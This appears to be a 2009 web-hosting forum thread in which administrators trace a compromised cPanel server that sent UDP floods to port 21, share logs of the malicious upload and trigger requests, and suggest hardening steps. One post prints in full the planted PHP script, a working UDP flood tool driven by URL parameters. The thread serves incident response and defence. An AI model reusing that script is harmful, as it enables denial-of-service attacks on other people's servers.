Spewing UDP traffic

**fragbait** · 09-15-2009 03:27 AM

any one come across this problem?

I have a WHM server that in the last three days has been spewing UDP packets to port 21 on receiving locations. Not all the time, but a real pain the the rear.
I have had to put in an iptables rule to stop the server sending traffic on port 21, protocol UDP.

Using wireshark I saw no act that started the traffic, just that thousands of UDP packets left my server for port 21 on the receiving server, and the receiving server of course never responded to any of the packets.

It would appear that I am being used for a DOS attack against these server, anyone come across anything similar?

I have stopped the process,but now want to find the smoking gun.
Thanks in advance

**cPanelMattCurry** · 09-15-2009 08:16 AM

Hello,

I am sorry to hear you are having issues, however with this being possibly malicious I would recommend that you contact your data center to see if they can help you track down the source of this issue. Please let me know if you have any other questions.

Thank you,
Matthew Curry

**fragbait** · 09-15-2009 09:06 PM

We are a small organisation and I am the "data center". I am back tracking and have run root kit detectors to try and find how they got in and where but have found nothing so far.

SO I am working from the simple reality that my server was spewing out thousands of identical UDP packets at other servers in the world. Being UDP my server is not expecting any reply from the IP getting spewed at. Nor is one seen. Therefore I am trying to see what is triggering and controlling the flood.

Nothing so far found. And the my server was recently patched before this happened.

**fragbait** · 09-16-2009 12:51 AM

This Server of mine that got hacked, how I am not too sure. Possible an injection with cPanel?

At the same time as this happened:

Code:

Sep 12 20:15:49 web Cp-Wrap[2531]: Pushing "649 GETDOMAINIP xxxxxxx.xx.xx " to '/usr/local/cpanel/bin/apacheadmin' for UID: 649
Sep 12 20:15:49 web Cp-Wrap[2531]: CP-Wrapper terminated without error
Sep 12 20:15:49 web Cp-Wrap[2534]: Pushing "649 LISTSUBDOMAINS 0 " to '/usr/local/cpanel/bin/apacheadmin' for UID: 649
Sep 12 20:15:49 web Cp-Wrap[2534]: CP-Wrapper terminated without error
Sep 12 20:15:49 web Cp-Wrap[2536]: Pushing "649 LISTMULTIPARKED 0 " to '/usr/local/cpanel/bin/apacheadmin' for UID: 649
Sep 12 20:15:49 web Cp-Wrap[2536]: CP-Wrapper terminated without error
Sep 12 20:15:49 web Cp-Wrap[2538]: Pushing "649 COUNTDBS" to '/usr/local/cpanel/bin/mysqladmin' for UID: 649
Sep 12 20:15:49 web Cp-Wrap[2538]: CP-Wrapper terminated without error
Sep 12 20:15:49 web Cp-Wrap[2542]: Pushing "649 GETDISK" to '/usr/local/cpanel/bin/mysqladmin' for UID: 649
Sep 12 20:15:50 web Cp-Wrap[2542]: CP-Wrapper terminated without error
Sep 12 20:15:50 web Cp-Wrap[2549]: Pushing "649 LISTSTORE 0 0 " to '/usr/local/cpanel/bin/ftpadmin' for UID: 649
Sep 12 20:15:50 web Cp-Wrap[2549]: CP-Wrapper terminated without error

this file appeared on the customers xxxxxxx.xx.xx website
-rw-r--r-- 1 eastern eastern 418 Sep 12 20:16 oyes.php

containing

Code:

<?php

if(!$_GET['target'])
{
die('');
}

$target = $_GET['target'];

if(!$_GET['port'])
{
die('');
}

$port = $_GET['port'];

$sock=socket_create(AF_INET,SOCK_DGRAM,SOL_UDP);

if(!$sock) die("Cant Create Socket!!!");

$data='';
for($i=0;$i<1400;$i++)
{
$data.=chr(rand(0,255));
}

while(true)
{
if(!socket_sendto($sock,$data,strlen($data),0,$target,$port)) die("Error SendTo!!!");
}

?>

This was injected from 66.90.103.27, I have already contacted them to see what they may have to say.

After the injection of this php file a different IP address then started sending requests to this PHP file such as this:

Code:

208.38.181.149 - - [16/Sep/2009:04:46:29 +1200] "GET /oyes.php?target=70.84.89.186&port=21 HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9.1"

I am basically writing this to make people aware. I have cleaned up the problem and stopped the possibility of UDP packets being spewed from this server, but my bigger concern is I do not know definitively how they got in.

I don't think it was a password hack, but neither does a crafted cpanel attack seem likely as it was so surgical.
Anyone got any ideas?

**d_t** · 09-17-2009 02:41 PM

Same problem, same script (oyes.php), same IP:

Code:

grep 66.90.103.27 /usr/local/cpanel/logs/access_log | grep POST
66.90.103.27 proxy X [09/12/2009:06:21:04 -0000] "POST /frontend/x2/files/doupload.html HTTP/1.1" 200 0 "http://cpanel.XXX.XX/frontend/x2/files/upload.html?dir=%2fhome%2fXXX%2fpublic_html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"

The attack was on UDP port 21. I'm not sure yet if the password was stolen or there is a problem with cPanel authentication using proxy. If I'll find, I'll let you know. [the client user/domain was replaced with X]

**fragbait** · 09-17-2009 05:49 PM

Thanks DT

I did a look

Code:

grep 66.90.103.27 /usr/local/cpanel/logs/access_log | grep POST

and found this

Code:

66.90.103.27 - xxxxxx[09/12/2009:07:47:53 -0000] "POST /frontend/x/files/doupload.html HTTP/1.1" 200 0 "http://xx.xx.xx.xx:2082/frontend/x/files/upload.html?dir=%2fhome%2fxxxxxx%2fpublic_html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"
66.90.103.27 - xxxxxx [09/12/2009:08:16:10 -0000] "POST /frontend/x/files/doupload.html HTTP/1.1" 200 0 "http://xx.xx.xx.xx:2082/frontend/x/files/upload.html?dir=%2fhome%2fxxxxxx%2fpublic_html" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5"

So injection or password hacked?
The .lastlogin file did have their IP address in it. Could this only happen if they did logon?

**netearth** · 09-22-2009 09:16 AM

Hi there,

We just found one of these too, filename is q.php

Conents are the same.

We like you are trying to see how it was injected, I assume the /frontend/x2/files/doupload.html is secure - I only asked as there is very little comment from cpanel?

Chris

**hostultra** · 09-23-2009 07:59 PM

Check your apache access logs for the first hit from that IP.
If nothing is found check that users access log for anything suspicious.

Did your user write his cpanel password in a php config.php file for mysql?
Alot of users do this instead of creating a separate mysql user.
It means any php vulnerability gives away the users cpanel password.

Allowing php sockets is a bad idea, consider removing it if you do not need it.
Its not a default php module, and you dont need php sockets module to use fsockopen or cURL which most scripts that make remote connections use.

**jenlepp** · 12-04-2009 06:40 PM

Did anyone ever find how these got in? Just found one on a user site and diving now, but I was curious if anyone narrowed it down.

LinkBack

Thread Tools

Spewing UDP traffic

Spewing UDP Traffic

Spewing UDP Packets

More info on spewing UDP

Cpanel insertion

Incoming traffic usage far more than Outgoing traffic

UDP Port 3074 - does it count traffic?

Massive outgoing UDP traffic port 53

Urgent request : Server sending ~25mpbs UDP traffic out, need help. $ can be paid

25mbps traffic on UDP port 80: How do I block this?